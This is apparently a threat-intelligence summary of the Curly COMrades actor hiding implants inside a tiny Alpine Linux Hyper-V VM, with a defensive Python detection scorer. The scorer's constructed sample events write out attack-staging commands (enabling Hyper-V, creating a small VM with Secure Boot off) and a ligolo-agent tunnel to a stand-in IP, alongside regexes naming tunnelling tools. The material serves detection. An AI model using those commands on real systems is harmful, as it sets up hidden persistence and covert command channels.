Full Report
The threat actor known as Curly COMrades has been observed exploiting virtualization technologies as a way to bypass security solutions and execute custom malware. According to a new report from Bitdefender, the adversary is said to have enabled the Hyper-V role on selected victim systems to deploy a minimalistic, Alpine Linux-based virtual machine. "This hidden environment, with its lightweight
Analysis Summary
# Tool/Technique: Hyper-V Virtualization Abuse (Curly COMrades Context)
## Overview
The threat actor Curly COMrades has been observed abusing the native Windows Hyper-V virtualization platform to establish a hidden, persistent operating environment on compromised hosts. After enabling the Hyper-V role on selected Windows 10 victims, the actor deploys a minimalistic Alpine Linux virtual machine and runs its implants inside it. No vulnerability is exploited: host-based EDR inspects processes on the Windows host, not inside the guest, so the malware's process, file and memory activity is invisible to it, while the guest's outbound traffic still reaches the network through the host. The result is both evasion and persistence.
## Technical Details
- Type: Technique (Leveraging legitimate virtualization platform)
- Platform: Windows 10 (Host), Alpine Linux (Guest VM)
- Capabilities: Evasion of host-based EDR, creating a hidden command execution environment, hosting custom malware (CurlyShell, CurlCat).
- First Seen: The activity cluster has been active since late 2023; the Hyper-V technique was described in follow-up analysis published after the initial August 2025 reporting.
## MITRE ATT&CK Mapping
- **TA0005 - Defense Evasion**
  - T1564.006 - Hide Artifacts: Run Virtual Instance (malware executed inside a Hyper-V guest rather than on the monitored host)
- **TA0003 - Persistence**
  - T1547.001 - Registry Run Keys / Startup Folder (indirect mapping; the source text names no specific key, and the persistence described is the VM remaining on the host with CurlyShell running as a persistent reverse shell)
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols (HTTP GET polling for commands, HTTP POST for results)
## Functionality
### Core Capabilities
* **Evasion:** Running malware (CurlyShell, CurlCat) inside a disposable, lightweight Linux VM isolates execution from the native Windows host monitoring tools (EDR).
* **Lightweight Environment:** The deployed Alpine Linux VM has a very small footprint (roughly 120 MB of disk and 256 MB of RAM), small enough to go unnoticed on a workstation.
* **Reverse Shell:** **CurlyShell**, an ELF binary that runs inside the guest as a persistent reverse shell connecting back to the actor's C2 servers.
* **Data Flow:** HTTP GET requests poll the C2 for encrypted commands; command results are returned in HTTP POST requests.
### Advanced Features
* **Custom Malware Families:** **CurlyShell** (executes commands directly) and **CurlCat** (tunnels traffic via SSH) share most of their code base and are built to run inside the VM.
* **Reverse Proxy Capability:** Reliance on multiple proxy/tunneling tools (Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel, SSH) to maintain flexible C2 resilience.
* **Data Exfiltration/Transfer:** **CurlCat** is specifically noted for its role in bidirectional data transfer within the isolated environment.
## Indicators of Compromise
* File Hashes: N/A (Specific hashes not provided in the text)
* File Names: CurlyShell (ELF binary), CurlCat (Implied ELF binary or component)
* Registry Keys: N/A
* Network Indicators: Communication uses standard HTTP GET/POST, likely directed at C2 servers controlled by Curly COMrades (C2 addresses are not specified/defanged). Tunneling tools may generate outbound traffic associated with Resocks, Rsockstun, Ligolo-ng, or Stunnel.
* Behavioral Indicators: Hyper-V role enablement on hosts with no business need for virtualization; creation and start of a very small (about 256 MB RAM) Linux guest on a workstation; CurlyShell, a C++-compiled ELF binary, running as a headless background daemon inside the guest VM. Note that the ELF never executes on the Windows host itself, so its process does not appear in host process telemetry.
## Associated Threat Actors
* Curly COMrades (Active since late 2023, targeting Georgia and Moldova, interests aligned with Russia).
## Detection Methods
* Signature-based detection: Targeting known IOCs for associated tools (RuRat, Mimikatz, MucorAgent) used alongside the VM deployment.
* Behavioral detection: Monitoring for unusual Hyper-V role enablement (DISM, Enable-WindowsOptionalFeature, Install-WindowsFeature) followed by creation and start of a minimalistic Linux VM. Because CurlyShell runs inside the guest, host process monitoring will not see it directly; detection has to rely on the virtualization layer (role and VM lifecycle events, Hyper-V worker processes such as vmwp.exe, VHD/VHDX files in unusual locations) and on network telemetry for the guest's HTTP polling and tunnelling traffic leaving via the host.
* YARA rules: N/A (Specific rules not provided).
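As an added example for the behavioural detections above (not code from the Bitdefender report or from the actor): a small Python scorer that correlates the stages of the technique per host over constructed process-creation records. The field names (`host`, `image`, `cmdline`) and the sample command lines are assumptions about the telemetry export; the allowlist models the main false-positive source, hosts that legitimately run Hyper-V.

```python
"""Hunt for the Hyper-V staging pattern in process-creation telemetry.

Added example for this summary (not Bitdefender's or the actor's code): it
scores constructed Sysmon Event ID 1 / Security 4688-style records for the
three stages the page describes: enabling the Hyper-V role, creating and
starting a tiny Linux guest, and running tunnelling tools on the host.
Field names (host, image, cmdline) are assumptions about the export format."""
import re
from collections import defaultdict

# Stage 1: the Hyper-V role being turned on (DISM, PowerShell, Server Manager
# cmdlet) or the hypervisor being forced to launch at boot.
ROLE_ENABLE = re.compile(
    r"(enable-windowsoptionalfeature.*microsoft-hyper-v"
    r"|install-windowsfeature.*hyper-v"
    r"|dism(\.exe)?.*?/enable-feature.*?/featurename:microsoft-hyper-v"
    r"|bcdedit.*hypervisorlaunchtype\s+auto)",
    re.I,
)
# Stage 2: VM lifecycle cmdlets from the Hyper-V PowerShell module.
VM_CREATE = re.compile(
    r"\b(new-vm|import-vm|add-vmharddiskdrive|set-vmfirmware|start-vm)\b", re.I
)
SECUREBOOT_OFF = re.compile(r"-EnableSecureBoot\s+Off", re.I)
MEMORY = re.compile(r"-MemoryStartupBytes\s+(\d+)\s*(KB|MB|GB)?", re.I)
LINUX_HINT = re.compile(r"alpine|linux|\.qcow2", re.I)
# Stage 3: the proxy/tunnelling tools the summary lists.
TUNNELERS = re.compile(r"\b(ligolo|resocks|rsockstun|stunnel|ccproxy)\b", re.I)

SMALL_VM_MB = 512  # the observed guest ran with 256 MB of RAM


def _memory_mb(cmdline):
    """Parse -MemoryStartupBytes (a PowerShell numeric literal) into megabytes."""
    m = MEMORY.search(cmdline)
    if not m:
        return None
    value, unit = int(m.group(1)), (m.group(2) or "").upper()
    factor = {"": 1 / 1048576, "KB": 1 / 1024, "MB": 1, "GB": 1024}[unit]
    return value * factor


def classify(event):
    """Return the set of indicator tags raised by a single event."""
    cmd = event.get("cmdline", "")
    tags = set()
    if ROLE_ENABLE.search(cmd):
        tags.add("hyperv_role_enabled")
    if VM_CREATE.search(cmd):
        tags.add("vm_lifecycle")
        mb = _memory_mb(cmd)
        if mb is not None and mb <= SMALL_VM_MB:
            tags.add("small_vm")
        if LINUX_HINT.search(cmd):
            tags.add("linux_guest_hint")
        if SECUREBOOT_OFF.search(cmd):
            tags.add("secureboot_disabled")
    if TUNNELERS.search(cmd) or TUNNELERS.search(event.get("image", "")):
        tags.add("tunneling_tool")
    return tags


def severity(tags):
    """Role enablement plus VM creation on one host, or a small guest that
    looks like Linux / has Secure Boot off, is the high-confidence case."""
    if "hyperv_role_enabled" in tags and "vm_lifecycle" in tags:
        return "high"
    if "small_vm" in tags and tags & {"linux_guest_hint", "secureboot_disabled"}:
        return "high"
    return "medium" if tags else "none"


def correlate(events, allowlist=frozenset()):
    """Group indicators per host; skip hosts that legitimately run Hyper-V."""
    per_host = defaultdict(set)
    for ev in events:
        if ev["host"] in allowlist:
            continue
        per_host[ev["host"]] |= classify(ev)
    return {
        host: {"tags": tags, "severity": severity(tags)}
        for host, tags in per_host.items()
        if tags
    }


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    {"host": "WS-042", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoP -Command Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -NoRestart"},
    {"host": "WS-042", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"New-VM -Name WSL -MemoryStartupBytes 256MB -Generation 2 -VHDPath C:\ProgramData\alpine.vhdx"},
    {"host": "WS-042", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "Set-VMFirmware -VMName WSL -EnableSecureBoot Off; Start-VM WSL"},
    {"host": "DEV-07", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "New-VM -Name Ubuntu-Build -MemoryStartupBytes 4GB -Generation 2"},
    {"host": "WS-013", "image": r"C:\Users\Public\ligolo-agent.exe",
     "cmdline": "ligolo-agent.exe -connect 198.51.100.7:11601 -ignore-cert"},
]

if __name__ == "__main__":
    for host, finding in correlate(SAMPLE_EVENTS, allowlist={"DEV-07"}).items():
        print(host, finding["severity"], sorted(finding["tags"]))
```

The scorer deliberately looks only at what the host can see: the role being enabled, the VM being created and started, and tunnelling tools on the host. CurlyShell itself never appears in host process telemetry because it runs inside the guest, which is why stage 1 and 2 on a workstation that has no virtualization role in its baseline should be treated as the alert, not the implant name. Hyper-V's own VMMS operational log is a second source for the same lifecycle events if command-line logging is incomplete.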
## Mitigation Strategies
* **Prevention:** Disable or restrict the enablement of the Hyper-V role on endpoints unless explicitly required for business function. Implement strict controls over system configuration changes.
* **Hardening:** Deploy EDR/XDR with visibility into Hyper-V role changes and VM lifecycle activity on the host, and monitor for execution of the associated proxy/tunneling tools (Ligolo-ng, Stunnel) on endpoints. Pair host telemetry with network monitoring: binaries inside the guest are invisible to host agents, but the guest's traffic must still leave through the host's network stack.
## Related Tools/Techniques
* **Custom Malware:** CurlyShell, CurlCat, MucorAgent (Modular .NET implant), RuRat.
* **Third-Party Tools Used for Tunneling/Proxying:** Resocks, Rsockstun, Ligolo-ng, CCProxy, Stunnel.
* **Other Implants Mentioned:** Mimikatz (Credential Harvesting).
* **Technique Analogs:** Use of other virtual environments (VMware, KVM) for evasion.